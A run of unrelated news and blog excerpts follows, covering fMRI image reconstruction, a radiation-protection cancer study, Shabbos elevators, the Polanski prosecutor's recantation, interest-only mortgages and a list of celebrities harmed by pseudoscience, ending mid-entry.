The neckline of a garment that exposes cleavage is known as décolletage ( or décolleté in current French language ) .
Українська : Декольте , розрі з
escote ( es ) ; স্তনের খাঁজ ( bn ) ; décolleté ( fr ) ; Brjóstaskora ( is ) ; Eskote ( eu ) ; кливидж ( ru ) ; Rãnh ngực ( vi ) ; چاک سینه ( fa ) ; 乳溝 ( zh ) ; Kavalergang ( da ) ; Göğüs dekoltesi ( tr ) ; Pagitan ng dalawang mga suso ( tl ) ; Belahan dada ( id ) ; 乳溝 ( zh - hk ) ; 𢆡罅 ( yue ) ; شق الثدي ( ar ) ; 乳溝 ( zh - hant ) ; кливидж ( bg ) ; 胸の谷間 ( ja ) ; 가슴골 ( ko ) ; cleavage ( en ) ; mamvalo ( eo ) ; 乳沟 ( zh - hans ) ; فلقة البز ( arz ) the partial exposure of the separation between a woman 's breasts ( en ) ; la fendo inter la du mamoj de ino ( eo ) ; exposition partielle de la séparation entre les seins d'une femme ( fr ) canal intermamario ( es ) ; Biyak ng suso , Gatla ng mga suso , Biyak ng mga suso , Biyak sa gitna ng mga suso , Gatla sa mga suso , Hati sa pagitan ng dalawang mga suso , Gatla sa gitna ng mga suso , Biak ng mga suso , Pagitan ng suso , Gatla sa suso , Gitna ng dalawang mga suso , Gatla sa pagitan ng mga suso , Kalagitnaan ng dalawang mga suso , Hati ng dalawang suso , Gatla ng suso , Gitna ng dalawang suso ( tl ) ; Cleavage ( id ) ; دکولته , خط سینه , شکاف سینه ( fa ) ; デコルテ , 乳房間溝 ( ja ) ; Kalavalergangen ( da )
( WIRED ) -- Scientists are one step closer to knowing what you 've seen by reading your mind .
Researchers used fMRI technology to try to pull images out of peoples ' brains .
Having modeled how images are represented in the brain , the researchers translated recorded patterns of neural activity into pictures of what test subjects had seen .
Though practical applications are decades away , the research could someday lead to dream - readers and thought - controlled computers .
" It 's what you would actually use if you were going to build a functional brain - reading device , " said Jack Gallant , a University of California , Berkeley neuroscientist .
The research , led by Gallant and Berkeley postdoctoral researcher Thomas Naselaris , builds on earlier work in which they used neural patterns to identify pictures from within a limited set of options .
The current approach , described this week in Neuron , uses a more complete view of the brain 's visual centers .
Its results are closer to reconstruction than identification , which Gallant likened to " the magician 's card trick where you pick a card from a deck , and he guesses which card you picked .
The magician knows all the cards you could have seen . "
In the latest study , " the card could be a photograph of anything in the universe .
The magician has to figure it out without ever seeing it , " said Gallant .
To construct their model , the researchers used an fMRI machine , which measures blood flow through the brain , to track neural activity in three people as they looked at pictures of everyday settings and objects .
As in the earlier study , they looked at parts of the brain linked to the shape of objects .
Unlike before , they looked at regions whose activity correlates with general classifications , such as " buildings " or " small groups of people . "
Once the model was calibrated , the test subjects looked at another set of pictures .
After interpreting the resulting neural patterns , the researchers ' program plucked corresponding pictures from a database of 6 million images .
Frank Tong , a Vanderbilt University neuroscientist who studies how thoughts are manifested in the brain , said the Neuron study was n't quite a pure , draw - from - scratch reconstruction .
But it was impressive nonetheless , especially for the detail it gathered from measurements that are still extremely coarse .
The researchers ' fMRI readings bundled the output of millions of neurons into single output blocks .
" At the finer level , there is a ton of information .
We just do n't have a way to tap into that without opening the skull and accessing it directly , " said Tong .
Gallant hopes to develop methods of interpreting other types of brain activity measurement , such as optical laser scans or EEG readings .
He mentioned medical communication devices as a possible application , and computer programs for which visual thinking makes sense -- CAD - CAM or Photoshop , straight from the brain .
Such applications are decades away , but " you could use algorithms like this to decode other things than vision , " said Gallant .
" In theory , you could analyze internal speech .
You could have someone talk to themselves , and have it come out in a machine . "
Subscribe to WIRED magazine for less than $ 1 an issue and get a FREE GIFT !
Click here !
Copyright 2009 Wired.com .
Researchers at the University of Pittsburgh School of Medicine and the National Cancer Institute ( NCI ) , part of the National Institutes of Health , may be hot on the heels of a Holy Grail of cancer therapy :
They have found a way to not only protect healthy tissue from the toxic effects of radiation treatment , but also increase tumor death .
The findings appear today in Science Translational Medicine .
More than half of all cancer patients are treated at least in part with radiation , said study co-author Jeff S. Isenberg , M.D. , M.P.H. , associate professor , Division of Pulmonary , Allergy , and Critical Care Medicine , Pitt School of Medicine .
But the same radiation that kills cancer cells can also destroy healthy ones , causing side effects such as nausea and vomiting , skin sores and rashes , and weakness and fatigue .
Long - term radiation exposure can lead to the scarring and death of normal tissue .
He and his NCI colleagues have identified a biochemical signaling pathway that can profoundly influence what happens to both cancerous and healthy cells when they are exposed to radiation .
In mouse experiments , they found that blocking a molecule called thrombospondin - 1 from binding to its cell surface receptor , called CD47 , affords normal tissues nearly complete protection from both standard and very high doses of radiation .
" We almost could n't believe what we were seeing , " Dr. Isenberg said .
" This dramatic protective effect occurred in skin , muscle and bone marrow cells , which is very encouraging .
Cells that might have died of radiation exposure remained viable and functional when pre-treated with agents that interfere with the thrombospondin - 1 / CD47 pathway . "
There have been concerns that approaches to spare healthy cells will risk inadvertently protecting tumor cells , noted senior author David D. Roberts , Ph.D. , of the NCI 's Center for Cancer Research .
But , he added , " in our experiments , suppression of CD47 robustly delayed the regrowth of tumors in radiation - treated mice . "
It 's not yet clear why disrupting the CD47 signaling pathway leads to these effects , the researchers said .
It 's possible that radiation impairs the immune response to tumors even while killing tumor cells , but suppression of CD47 keeps the immune cells safe .
Decreasing CD47 levels on tumor cells also could make them more sensitive to attack by the patient 's immune system after treatment .
Or , suppression of injury to vascular cells might improve blood flow to allow naturally occurring anti-tumor immunity to reach cancer cells more easily .
The researchers are already exploring the signaling pathway 's role in several other domains , noted Mark Gladwin , M.D. , chief of Pitt 's Division of Pulmonary , Allergy , and Critical Care Medicine and director of the Vascular Medicine Institute , where Dr. Isenberg is a principal investigator .
" Dr. Isenberg and his team are examining multiple disease treatment strategies for pulmonary hypertension , wound healing , sickle cell disease and heart attacks , based on the blockade of the thrombospondin - 1 / CD47 pathway , " he said .
Co-authors of the paper include lead author Justin B. Maxhimer , M.D. , David R. Soto - Pantoja , Ph.D. , Lisa A. Ridnour , Ph.D. , Hubert B. Shih , William G. Degraff , Maria Tsokos , M.D. , and David A. Wink , Ph.D. , all of the Center for Cancer Research , NCI .
The research was funded by the Intramural Research Program of the National Cancer Institute , the Howard Hughes Medical Institute - NIH Research Scholars Program and the NIH .
The inventions described in this paper are the subject of a patent application .
Despite Japan being notorious for fast to appear and equally fast to fade fads , the so - called Japanese pet boom , which has amazingly been ‘ booming ’ for years now , stills shows no signs of abating — at least as far as decidedly diminutive dogs are concerned .
And as such , the likes of fancy pet foodstuffs , fashion and constant cries of kawaii ! are unfortunately far from uncommon .
In fact , it ’s a trend that some suggest is possibly being driven by a considerable number of these pets being seen as child substitutes , which , given their often over - the - top treatment and Japan ’s low birth rate , could well be true .
Plus there are benefits of course , as boozing on a Sunday afternoon at least is considerably easier and more carefree with a canine than it is with a kid .
The trouble is , it ’s not all fun and games , and after years of depicting these dogs as cute and cuddly little accessories , one TV channel at least has bravely opted to air the dark side of the dog boom .
A video that I should warn is undoubtedly distressing ( at least from the 5 minute mark ) as it shows how a large number of unwanted and unable to be cared for canines end up — quite literally .
And viewing is made even more uncomfortable by the knowledge that it ’s a practice that apparently is performed practically everyday .
There are no subtitles I ’m afraid , but the last part at least needs little in the way of explanation .
But once again , I should reiterate that it is far from easy viewing .
Oh lamb chops , oh pork belly , oh brisket of beef , how numbered are your days !
Where will you go to , barbecued ribs , now you have been exiled from this kingdom ?
Yes , this week , Lord Stern , the author of the Stern Review on the Economics of Climate Change , announced that it is time to address the nation 's carnivorous habits .
" Meat , " he declared , " is a wasteful use of water and creates a lot of greenhouse gases .
It puts enormous pressure on the world 's resources .
A vegetarian diet is better . "
For many , the prospect of a life without meat may seem far more desolate than a world without polar ice caps .
But the plain fact is that we must reduce the amount of meat and dairy we consume if we are to protect our planet .
A kilogram of beef is responsible for more greenhouse gases than a three - hour car journey while leaving all the lights on in your home .
Our oceans are overfished and polluted by commercial fish farms .
And while you might be a little gloomy about the notion of a lunchtime without a ham sandwich , the message is really quite simple : grow up and stop wrinkling your nose .
After all , they are only lentils , and they will not hurt you .
However , the transition to vegetarianism can be daunting .
The most sensible approach is to gradually reduce the quantity of meat in your diet .
For some people this may mean cutting out red meat , or all meat except fish , or perhaps just cooking a Sunday roast and spreading the meat through the week .
At the same time , try to release your white - knuckled grip on the idea that meat makes a meal ; in Britain we have become wedded to the image of a meal as a central piece of meat , dressed up with some carbs and vegetables , but there are many other types of cooking , such as Indian , Thai and Japanese , that lend themselves more readily to simple vegetarian cuisine .
When giving up meat , many people are tempted to run straight into the welcoming arms of cheese .
This is not a great idea .
Dairy farming also has a hugely detrimental effect on the environment ( not to mention the fact that not all cheeses are actually vegetarian ) .
Broaden your culinary horizons , get to know tamari and tempeh , soy milk and cashew cheese , enjoy a little experimentation .
If someone replaced my tofu with some tofu - flavoured chicken , I too would be upset .
So likewise , it 's best not to try directly replacing a meat you love with a vegetarian alternative – a craving for pork chops will never be met by a slab of tempeh , and vice versa .
Yes , for some , fakin ' bacon and Quorn fillets are a stepping - stone to vegetarianism , but personally I think you 'll be disappointed .
It is far better to acquaint yourself with the delights of vegetarian cuisine , to understand that in fact the staples of vegetarian diets are not meat substitutes but are simply different foods and you have to learn how to work with them ; you do n't cook tofu like chicken , just as you do n't cook trout like guinea fowl .
Give it time and enthusiasm and an open mind .
Five tips for going vegetarian
1 Do n't go cold turkey Giving something up in one go rarely works ; if you reduce your meat consumption gradually you will be more likely to stick to it .
2 Be sure to get your vitamins Meat is an easy source of iron and B vitamins .
Instead , choose green leafy vegetables , seaweeds and use B - rich nutritional yeast ( such as Marmite ) in sauces .
3 Go easy on the cheese Dairy farming is also environmentally damaging , so investigate vegan cheeses , which are made from soy or nuts .
4 Do n't seek out substitutes
If you leap straight from chicken breast to Quorn fillets you will be disappointed .
5 Be adventurous Exploring vegetarian cuisine is much like learning how to cook Japanese or real Italian – it 's exciting and subtle and takes a little time .
For experience , skill and personal service , come to the law firm of Ian F. Mann , P.A .
Our law office is conveniently located in downtown Fort Myers , just two blocks from the federal and state courthouses .
If you cannot come to us , attorney Mann can come to you .
Call 239-935-5935 or email us today .
We return all messages promptly .
Tangible things occupy the days of most building managers in New York City .
Hot water , floods , bugs , rent checks and so on .
But last week , newly added to the tenant issues facing building managers like Harold M. Jacob , who runs a co-op on the Lower East Side where Orthodox Jews inhabit a substantial portion of the 2,500 apartments , was this almost ontological question :
Does that elevator “ know ” how many people are on it ?
The question is at the core of a ruling issued by a group of prominent rabbis in Israel on Sept. 29 that seems to ban the use of many so - called Shabbos elevators : elevators fixed to stop on every floor from Friday evening until Saturday evening so that observant Jews do not have to press any buttons .
Since the 1960s , when high - rise apartment buildings became ubiquitous , the Orthodox rabbinate has made such elevators one of the few exceptions to Talmudic rules prohibiting 39 categories of activity on the Sabbath , including manual labor or the use of electrical devices .
Like flipping a light switch , pressing an elevator button is considered the use of an electrical device .
“ Are you sure that ’s what it said ? ” Mr. Jacob asked a person on the other end of the phone line the other day , sitting at his cluttered desk in the management office of Cooperative Village , the co-op he is in charge of .
“ It ca n’t be used ? ”
Mothers who smoke while pregnant 20 % more likely to have psychotic children
Mothers who smoke during pregnancy put their children at greater risk of developing psychotic symptoms as teenagers , British scientists said today .
A UK survey of 12 - year - olds found those whose mothers smoked were 20 per cent more likely to have psychotic - like symptoms such as hallucinations or delusions .
The researchers from four British universities found the link was 84 per cent more pronounced if mothers smoked 20 or more cigarettes a day .
Children whose mothers smoked , were 20 per cent more likely to display psychotic symptoms when they grew older
Many previous studies have shown cigarettes can harm the foetuses of mothers who smoke while pregnant .
The risks include causing babies to be born smaller and increasing the risk of sudden infant death syndrome or heart defects .
Despite countless studies flagging up the risks to babies , it is estimated up to one in five women in Britain smoke during pregnancy .
Stanley Zammit , a psychiatrist at Cardiff University 's School of Medicine who led the study , said the more the mothers smoked , the more likely their children were to have psychotic symptoms .
' We can estimate that about 20 percent of adolescents in this cohort would not have developed psychotic symptoms if their mothers had not smoked , ' he said .
Dr Zammit and colleagues suggested that exposure to tobacco in the womb might affect a child 's brain function that governs attention and cognition .
They added further research was needed
Only a few mothers in the study , which was published in the British Journal of Psychiatry , said they had smoked cannabis during pregnancy , and this was not found to have any significant link with psychotic symptoms .
The researchers also found drinking during pregnancy was associated with increased psychotic symptoms , but only in children whose mothers had drunk more than 21 units of alcohol a week in early pregnancy .
( CNN ) --
A retired prosecutor whose comments in a 2008 HBO documentary threatened to derail a 31 - year - old sex case against film director Roman Polanski now says he lied .
David Wells , a former prosecutor , now says he lied about his role in the Roman Polanski case .
David Wells told CNN's Wolf Blitzer on Thursday that he " buttered up " his role in the Polanski case for the documentary crew .
He said he lied about trying to goad a judge to sentence Polanski to prison in 1978 for having sex with a 13 - year - old girl .
Wells ' comments in " Roman Polanski : Wanted and Desired " raised questions of judicial misconduct and spawned Polanski 's most recent effort to get the case dismissed .
But the legal challenge stalled when Polanski refused to return to the United States , where he faced certain arrest .
" I made these imprudent comments , just to liven it up a little , " Wells said .
" In retrospect , it was a bad thing to do , and I never knew this thing was going to be shown in the United States . "
Watch Wells ' rueful admission »
Wells now says he never spoke with the judge about the Polanski case , as he had claimed in the documentary .
" I never discussed this case with [ the judge ] at any time , " Wells told Blitzer .
Asked why he should be believed now , Wells said , " I 'm destroying my character in public and everybody in the world knows about it .
... I do n't like admitting this . "
He agreed to take a polygraph test to set the record straight .
Polanski was arrested last weekend in Switzerland on a 1978 fugitive warrant and will fight extradition , his lawyers said .
They had no immediate comment on Wells ' recantation .
" I am astonished that he has now changed his story , " Marina Zenovich , the documentary 's director , said in an e-mailed statement .
" It is a sad day for documentary filmmakers when something like this happens . "
She said Wells signed a release form , never raised any doubts or concerns , and vouched for the documentary when he spoke to The New York Times in July 2008 .
Wells also acknowledged that he lied to The New York Times .
" I figured Polanski never was going to come back , " he said .
" I did n't want to put myself out as a liar . "
Polanski's arrest in Switzerland made Wells ' public exposure inevitable , he said .
" I 'm going to tell it the way it is and if I take a beating over it , I deserve it , " he said .
Blitzer challenged Wells to a polygraph test , and he agreed to take one if his former employers at the Los Angeles County , California , District Attorney 's office allow it .
" I 'm not going to do anything more to hamper the District Attorney 's case , " he said .
District Attorney 's spokeswoman Sandi Gibbons said the office had no position on the polygraph challenge .
" Mr. Wells is retired , " she said .
" We have no control over him . "
Wells was a bit player in a high profile case that has haunted the courts of Los Angeles for three decades .
He was a calendar prosecutor , handling routine matters in the courtroom of Superior Court Judge Laurence Rittenband , who oversaw the Polanski case .
Rittenband , who died in 1993 , had a fascination with celebrity cases , and was so publicity conscious that he directed his courtroom staff to keep a scrapbook of news clippings , according to court records .
Polanski was charged with six felonies , including sodomy and rape , but pleaded guilty to a single count of having unlawful sexual intercourse with a minor under a plea bargain .
The director , his lawyer and the prosecutor handling the case believed they 'd reached a deal that would spare the young victim a public trial and Polanski jail time , according to court records .
Polanski fled the United States before sentencing .
He was spooked when Rittenband indicated he would not honor the deal and instead intended to send the famed director to prison .
Watch how the plea bargain went south »
The charges stemmed from Polanski's March 1977 encounter with the 13 - year - old girl during a photo shoot at actor Jack Nicholson 's house on Mulholland Drive .
Polanski told the girl 's mother he was on assignment for French Vogue , according to court records .
Wells said he was critical about the manner in which the case was handled .
He believed Polanski should go to prison .
He told the documentary makers that he suggested to Rittenband that Polanski be sent for 90 days of " diagnostic testing " at a state prison facility in Chino , California , to determine whether he was a sex offender .
He admitted to CNN that he was lying about suggesting the 90 - day evaluation , adding that Rittenband routinely sent defendants for evaluation .
The evaluation was completed in 42 days , and Polanski was freed early after it determined he was not a sex offender .
Watch CNN 's Jeff Toobin call it a sideshow »
Polanski was given permission to travel to Europe to complete a film before he was formally sentenced .
It was understood by everyone that Polanski would receive credit for time served and probation , according to filings in his legal challenge .
While Polanski was in Europe , Wells said in the documentary , a photograph appeared of the director smoking a cigar , sipping a beer and accompanied by two young women .
A script from the documentary in the court file lays out what Wells said happened next :
" And so I took the picture into Judge Rittenband .
I said , ' Judge , ' I said , ' look here , he 's flipping you off , ' " he said .
" I took it to Rittenband because I figured it was something he ought to see .
And what I told him was , I said , ' You know , judge , you 've made so many mistakes , I think , in this case .
Look .
He 's giving you the finger .
He 's flipping you off .
And here 's the way he 's doing it . '
And I said , ' Have n't you had enough of this ? '
And then , of course , he exploded and what happened , happened . "
Wells now says he lied about that , too .
He said a newspaper reporter handed him the photo , which he passed on to the judge 's court staff .
" I could call it building a bigger story , putting my part in the case bigger than it actually was , " he said .
" But when you peel away all the feathers , it 's just a lie .
I should n't have done it .
I wish I did n't . "
All About Roman Polanski • Criminal Sentencing and Punishment • Sexual Offenses
Interest only ( IO ) loans seemed like a viable mortgage option when home prices were appreciating on a double - digit basis every year .
The interest only loan allowed borrowers the option of making no principal payments for 5 , 7 , or even 10 years .
Now why would someone not make any principal payment for such a long time ?
The way these mortgages were pitched , people would buy a home for 3 , 5 , or 7 years and would sell their home before the reset period .
Yet the housing bubble has burst and home prices are now below the average balance of these mortgage in many areas .
Recent data has the median U.S. home price at $ 178,000 while the average loan amount of an interest only loan is $ 324,000 .
How many of these loans are out there ?
Try 2.8 million .
Many in overpriced states that have taken the brunt of the housing downturn .
As I discussed before , option ARM loans are a smaller amount of loans with a total amount of $ 189 billion outstanding .
The option ARM will have more problems simply because borrowers went with even less than interest only , they went with the negative amortization option .
That is , their principal balance is now higher than when they initially purchased the home .
With interest only and option ARM loans you pay on the front - end for this riskier product .
Borrowers simply looked at the initial payment and ignored points , recast dates , reset periods , and the inevitable payment jump after a few years .
These loans are products of an ideal market with no home price declines .
That is the only thing that could destroy these loans but not only did we get lower prices , we got a crashing housing market .
In many scenarios , a 30 - year fixed rate mortgage will have a lower wholesale rate to an IO loan of about .375 % .
This assumes a 20 percent down payment that very few did in the last decade .
Many borrowers that elected to go with interest only payments have been virtually renting their home for 3 , 5 , or 7 years .
Over the long run , assuming all else is equal , interest only loans will cost the borrower more money and more interest :
We ’ll use a simple example to illustrate .
The first example is an IO loan with a 5 year period .
For the first five years , the balance remains at $ 350,000 .
No principal is touched .
Over the long run the borrower will pay $ 802,000 in total payments .
Now look at the fixed rate mortgage .
Over the long run the borrower will make $ 775,000 in total payments .
Plus , at year five the balance is down to $ 332,000 .
But the major appeal was that monthly mortgage payment .
$ 2,155 versus $ 1,822 .
Even the payment becomes a problem once the mortgage fully amortizes with principal and interest on a 25 year horizon :
After five years the payment will jump to $ 2,308 from $ 1,822 .
This is a jump of 26 percent and we are using a perfect scenario here .
The reality is , many loans will reset to 50 or even 75 percent higher for a couple of reasons :
a. Teaser Rates
b. Most made IO payment with no principal
Just because you have an interest only loan does not mean you have to make the minimum payment .
Borrowers had the option to make payments that covered the principal but like those that took out option ARMs the incredible majority did not .
And this jump of about 26 percent seems to be in line with real world examples :
“ ( NY Times ) Dean Janis , a Southern California lawyer who bought a $ 950,000 home in 2004 , will see his interest - only loan reset in December .
He calculates that will send his payments up a minimum of 27 percent , to $ 3,726 .
A rise in rates could eventually push it as high as $ 6,700 .
“ I understand I took a risk , ” Mr. Janis said .
“ But I did not anticipate that the real estate market would go down 30 percent . ”
He talked with Wells Fargo about his options , and the lender said he had none .
Homeowners with interest - only loans have a much greater likelihood of default , the First American CoreLogic figures indicate .
Nationally about 18 percent of prime interest - only loans are at least 60 days delinquent .
In California , the level is even higher : 21 percent , a rate exceeded only in the other bubble states of Florida and Nevada . ”
Here is the major gamble with those in interest only loans .
They are fortunate that the current interest market is at record lows .
Many of these loans are calculated by the LIBOR , COFI , or CMT and these are all at record lows :
The only reason these rates are this low is because of a couple of reasons .
First the Federal Reserve is determined to destroy the U.S. dollar by keeping the Fed funds rate near zero :
The other reason is because the Federal Reserve is openly buying mortgage backed securities from the market .
So right now , rates are as low as they will ever get .
With our massive budget deficits our major foreign buyers are now growing weary buying our debt .
What does that mean ?
Rates will go up .
And they are so artificially low , that a slight move up will change the calculus completely .
Take for example the lawyer from Southern California .
A 30 year fixed mortgage of $ 950,000 would have this as a minimum payment :
30 - year FRM
6.25 % balance of $ 950,000
Principal and Interest : $ 5,849
At the moment , he is only paying $ 2,933 on an interest only loan !
If this were a 30 year loan the max mortgage would be :
So if he enjoyed that initial payment and wanted it assured for the duration , he would have been able to buy a $ 486,000 home and have the same monthly amount due .
Instead , with an interest only loan he was able to buy a home twice that amount .
Now you might be asking , what would it take to push that mortgage to $ 6,700 ?
From the article we know the loan is a 5 year interest only .
We have to estimate since we are not given the down payment amount ( if any ) .
I would imagine for a $ 950,000 mortgage there must have been some down payment .
But let us run a few scenarios .
The home loan is still due within 30 years .
So the lawyer above now has 25 years to make his payment starting this December :
Remember the balance is still $ 950,000 since only interest was paid for 5 years
$ 950,000 @ 3 % PI ( 25 years ) = $ 4,505
$ 950,000 @ 4 % PI ( 25 years ) = $ 5,014
$ 950,000 @ 5 % PI ( 25 years ) = $ 5,553
$ 950,000 @ 6 % PI ( 25 years ) = $ 6,120
$ 950,000 @ 7 % PI ( 25 years ) = $ 6,714
And there it is .
The rate would only have to reach 7 percent for it to approach $ 6,700 .
And 7 percent on historical standards is extremely low .
From 1971 the average 30 year fixed rate mortgage average has been 9.04 % :
One item rarely discussed is that the Fed has no choice but to keep rates at the bottom .
Now they are competing against the world and the ticking time bomb of debt .
They are juicing the bubble bigger and bigger for a more spectacular crash down the road .
They are fighting against the mean and historical trend .
This can only go on for so long .
These borrowers , most will default simply because their home prices are underwater , but with an increase in rates ( the only way to go ) will default even quicker .
So the U.S. Treasury and Federal Reserve have decided to sacrifice the stability of our currency to keep the housing bubble going .
Yet what is becoming painfully obvious with loans like interest only products is the Fed can only do so much .
The option ARM and interest only loan were the ultimate culmination of a 30 year housing bubble which finally got to the point where anyone with a pulse and no down payment was able to buy a home simply buy signing a piece of paper .
This is going to end bad .
If you enjoyed this post click here to subscribe to a complete feed and stay up to date with today ’s challenging market !
For more on this topic :
368,379 people killed , 306,096 injured and over $ 2,815,931,000 in economic damages
What 's the harm in being famous ?
Well , of course there is no harm in being famous .
But it does n't protect you either .
Many celebrities or otherwise well - known people have been caught up in misinformation .
Here are their stories .
Here are 185 people who were harmed by someone not thinking critically .
Fela Anikulapo - Kuti ( musician ) Age : 58
Lagos , Nigeria Died
August 2 , 1997
A famous musician and activist in Nigeria , Fela claimed that AIDS did not exist .
He later died of the disease .
Read more & more
Steve Bechler ( athlete ) Age : 23
Fort Lauderdale , Florida Died
February 17 , 2003
He was trying to lose some weight during Orioles spring training , using a supplement that contained the Chinese herbal remedy ephedra .
He collapsed from multiple organ failure in the heat and died .
The FDA banned ephedra a year later .
Read more & more
Jason Beghe Age : 48
Los Angeles , California Spent $ 1 M on Scientology
April 2008
An actor , he quit Scientology after 12 years when he realized the Church 's practices were harmful .
In a long interview posted on the internet , he explains his concerns .
Read more & more & more
Samantha Cools ( athlete ) Age : 22
Airdrie , Alberta , Canada Neck injury just before Olympics
May 2008
Her chiropractor over - rotated her neck during a routine adjustment , tearing tendons and muscles .
This painful injury even limited her ability to eat , mere weeks before the world championships .
She came in fifth , and DNFed at the Olympics .
Read more
Jacqui Dean ( MP ) Age : 50
Otago , New Zealand Public embarrassment
August 23 , 2007
She was fooled by an online hoax that demanded a ban of " dihidrogen monoxide " .
( This is another name for water ) .
She sent a letter to the Health Ministry asking for an opinion on banning the substance .
Read more
Dr. Louis A. Gottschalk ( psychiatrist ) Age : 89
Irvine , California $ 1.3 to $ 3 million
March 2 , 2006
A renowned psychiatrist at UC Irvine , his son alleges in a lawsuit that he has squandered millions on scams , even travelling to Africa once .
Read more
President Warren G. Harding Age : 57
Palace Hotel , San Francisco , California Died
August 2 , 1923
Despite the misgivings of a physician , his personal homeopath let him do arduous tasks and speak in the heat .
When he had a bout of food poisoning , the homeopath applied heavy doses of purgatives to flush out toxins .
He died .
No autopsy was done .
Read more & more
Isaac Hayes ( musician ) Age : 64
Cordova , Tennessee Income disrupted
March 2006 According to Roger Friedman , it was representatives of Scientology that forced him to quit as Chef on " South Park " when the show lampooned the religion .
" Isaac 's income stream was severely impaired as a result . "
Read more
Jeff Healey ( musician ) Age : 41
Toronto , Ontario , Canada
Time wasted on useless treatments
March 2 , 2008
In 2007 Healey underwent surgery to remove cancerous tissue from his legs and both lungs .
Radiation and chemotherapy failed to halt the spread of the disease , as did alternative homeopathic treatment in the U.S. this year .
Read more
Doug Henning ( magician ) Age : 39
Los Angeles , California Abandoned successful career
1986 He was a hugely successful magician .
He abandoned his career to devote all his time to studying Transcendental Meditation , which he thought would allow him to levitate .
When he died of liver cancer , TM people claimed he was cancer free .
Read more
Jim Henson ( puppeteer ) Age : 53
New York City , New York Died ( septic shock )
May 16 , 1990
He had felt sick for several days .
His wife later told a magazine that he probably delayed going to the hospital due in part to his Christian Science upbringing .
Had he gone earlier his infection would have been treatable .
Instead he died .
Read more & more
Andy Kaufman ( comedian ) Age : 35
Los Angeles , California Died
May 16 , 1984 Diagnosed with inoperable cancer , he sought out alternative therapies .
He even flew to the Philippines to receive psychic surgery for six weeks .
These treatments wasted time he could have spent with his family before he died .
Read more & more
Coretta Scott King ( civil rights )
Age : 78
Rosarito , Mexico
Last days spent on pointless treatments
January 30 , 2006
She was the widow of Dr. Martin Luther King Jr. and a respected civil rights leader herself .
She was diagnosed with ovarian cancer , and sought out alternative therapies from a clinic in Mexico .
She died there of complications .
Read more & more & more
Bob Marley ( musician ) Age : 36
Nine Miles , Jamaica Died ( untreated cancer )
May 11 , 1981
In July 1977 he was diagnosed with malignant melanoma in his right big toe .
His Rastafarian religious beliefs did not allow for amputation .
He sought alternative therapies as the cancer spread to the rest of his body .
He died in 1981 .
Read more
Susannah McCorkle ( Jazz singer ) Age : 55
New York City , New York Suicide
May 19 , 2001
She battled depression all her life , but stopped taking antidepressants due to side effects .
She consulted a homeopath instead .
After a setback she promised a friend she would take the Tegretol that had been prescribed .
Four days later she was dead .
Read more
Steve McQueen ( actor ) Age : 50
Juárez , Mexico Died ( lung cancer )
November 7 , 1980 Dying of lung cancer , Mr. McQueen sought out treatment with the controversial drug Laetrile in a clinic in Juárez , Mexico .
He died there .
Read more
Sylvia Millecam ( actress ) Age : 45
Boxmeer , Netherlands Died ( untreated cancer )
August 19 , 2001
A popular television personality , she sought out alternative therapies for her breast cancer , including a new age psychic healer .
Two of her physicians were later barred permanently from medical practice .
Read more & more
Bando Mitsugoro VIII ( Kabuki actor ) Age : 68
Kyoto , Japan Died
January 16 , 1975
The liver of the fugu fish is widely known to be toxic , but he believed he could survive the poison .
He ate four of them as a demonstration .
Within minutes he died of paralysis and convulsions .
Read more
Peter Mokaba ( politician ) Age : 43
Johannesburg , South Africa Died
June 9 , 2002
A strong youth leader during South Africa 's struggle for freedom , he later denied the existence of HIV .
He also described anti-retroviral medications for AIDS as " poison " .
He later died of the disease .
Read more & more
Grace Park Age : 29
Seoul , South Korea Bruised back
2007 Grace is an LPGA golfer .
After hurting her back in 2005 , she desperately tried any type of treatment to recover .
A Korean form of acupuncture bruised her back and put her in agony .
Weeks later she was bruised and her back was no better .
Read more
Sarah Parkinson ( actress ) Age : 41
East Sussex , England Died ( untreated breast cancer )
September 23 , 2003
When she was diagnosed with breast cancer , she was concerned that chemotherapy would prevent her from using IVF to start a family .
Instead she used acupuncture , spiritual healing , homeopathy and Johrei to treat it .
Read more & more
Lou Pearlman ( businessman ) Orlando , Florida Tenant broke lease , lost $ 145 K in back rent
November 4 , 2004
One of Lou 's business tenants discovered the space they had leased was supposedly haunted .
They refused to move in , breaking a lease agreement .
A lawsuit resulted .
Read more & more
Darrell " Wayne " Perry ( songwriter ) Age : 55
Monroe , Ohio Died
May 15 , 2005
He had cancer , but his tele - evangelist aunt allegedly advised him to stop taking medication and allow God to heal him .
She then wrote about this in a book .
He died , and his children sued for wrongful death , but later dropped the suit .
Read more & more & more & more
Paula Radcliffe ( athlete ) Age : 32
Athens , Greece Olympic medal attempts ruined
August 22 , 2004
She is a British athlete .
Weeks before the 2004 Athens Olympics , a doctor injected her with a homeopathic remedy for a leg injury .
The treatments allegedly caused a stomach ailment that forced her to withdraw from the marathon after 23 miles .
Read more & more
U.S. Congressman Leo J. Ryan Age : 53
Port Kaituma , Barima - Waini Guyana Murdered
November 18 , 1978 Visiting Guyana to investigate reports of abuse within a cult that had many members from his district , Congressman Ryan was murdered as he attempted to leave the country .
Read more
Sandra Schmirler ( athlete ) Age : 36
Regina , Saskatchewan , Canada Died ( cancer )
March 2 , 2000
An Olympic gold medalist and three - time world champion in curling , she contracted esophageal cancer .
Unfortunately she received treatment from a provider that uses remedies that are not scientifically proven .
She died , leaving two children .
Read more & more & more
Peter Sellers ( actor ) Age : 54
Dorchester , England Died ( untreated heart condition )
July 24 , 1980 A heart attack in 1964 had permanently damaged his heart .
His doctors were advising bypass surgery , but he delayed it and instead saw psychic surgeons twice a year .
He died of a massive heart attack .
Read more & more
Clay Shaw ( businessman ) Age : 55
New Orleans , Louisiana Prosecuted for conspiracy
March 1967 - March 1969
The district attorney believed conspiracy theories about the JFK assassination and thought Clay was involved .
He was arrested and prosecuted .
The jury exonerated him in less than one hour .
Read more
Barry Sheene ( motorcyclist ) Age : 52
Gold Coast , Queensland , Australia Died ( untreated cancer )
March 8 , 2003
He was a world - famous motorcycle racer and commentator .
Diagnosed with cancer , he rejected chemotherapy .
He treated himself with " natural therapy " consisting mainly of a low - protein diet , plus " microwave therapy . "
He died less than a year later .
Read more & more & more
Wesley Snipes ( actor ) Age : 45
Ocala , Florida Federal indictment on $ 12 Million fraud
October 17 , 2006 Mr. Snipes made the mistake of hiring a tax advisor who is a " tax protestor " , and believing what that person told him .
He was eventually sentenced to three years in prison .
Read more
Susan Strasberg ( actress ) Age : 60
New York , New York Died ( untreated cancer )
January 21 , 1999 Diagnosed with breast cancer , she sought out a psychic healer from Russia , who later claimed to have cured her .
She died from cancer three years later .
Read more
Michael Tylo II Age : 19
